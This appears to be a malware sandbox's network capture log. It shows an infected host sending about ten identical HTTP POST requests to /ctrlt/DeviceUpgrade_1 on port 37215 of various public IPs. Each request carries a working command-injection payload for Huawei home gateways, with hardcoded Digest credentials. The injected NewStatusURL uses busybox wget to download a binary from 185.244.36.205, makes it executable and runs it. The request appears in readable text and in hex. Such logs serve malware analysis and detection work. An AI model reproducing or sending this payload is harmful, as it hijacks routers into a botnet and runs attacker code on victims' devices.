                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              51192.168.2.1555834138.87.102.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033844948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              52192.168.2.1550402186.199.181.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033849955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              53192.168.2.1544800222.80.134.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033869982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              54192.168.2.1559682102.4.87.12737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033871889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              55192.168.2.155043241.108.231.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033910990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              56192.168.2.1546648102.179.57.10437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033914089 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              57192.168.2.1552012122.11.106.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034003973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              58192.168.2.1541286181.113.129.21137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034008980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              59192.168.2.1547278173.93.221.637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034008980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              60192.168.2.154607241.139.66.15237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034030914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
